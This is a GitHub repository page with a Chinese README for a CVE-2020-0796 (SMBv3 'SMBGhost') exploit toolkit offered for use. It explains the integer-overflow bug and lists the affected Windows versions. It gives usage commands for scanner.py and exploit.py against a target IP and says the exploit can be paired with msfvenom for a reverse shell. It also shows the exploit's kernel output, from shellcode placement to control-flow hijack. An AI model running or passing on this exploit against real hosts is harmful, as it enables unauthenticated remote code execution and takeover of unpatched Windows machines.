GitHub - OldDream666/cve-2020-0796: cve-2020-0796利用工具集

OldDream666 / cve-2020-0796 Public

Notifications You must be signed in to change notification settings
Fork 1
Star 1

cve-2020-0796利用工具集

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
README.RD		README.RD
exploit.py		exploit.py
kernel_shellcode.asm		kernel_shellcode.asm
lznt1.py		lznt1.py
scanner.py		scanner.py
smb_win.py		smb_win.py

Repository files navigation

CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的；在解压数据包的时候使用客户端传过来的长度进行解压时，并没有检查长度是否合法，最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。
该漏洞类似于永恒之蓝（MS17-010）。


受影响的版本：
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)


所包含文件介绍
-----------
scanner.py
对存在CVE-2020-0796的漏洞主机进行扫描发现
格式：
python scanner.py ip
例：
python scanner.py 192.168.1.2

返回：
存在漏洞：ip Vulnerable.
不存在漏洞：ip Not vulnerable.
-----------
exploit.py
对存在漏洞的目标主机发起攻击，默认poc实现蓝屏，需配合msfvenom生成反弹poc
格式:
python exploit.py -ip ip
例子：
python exploit.py -ip 192.168.1.2

返回：
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...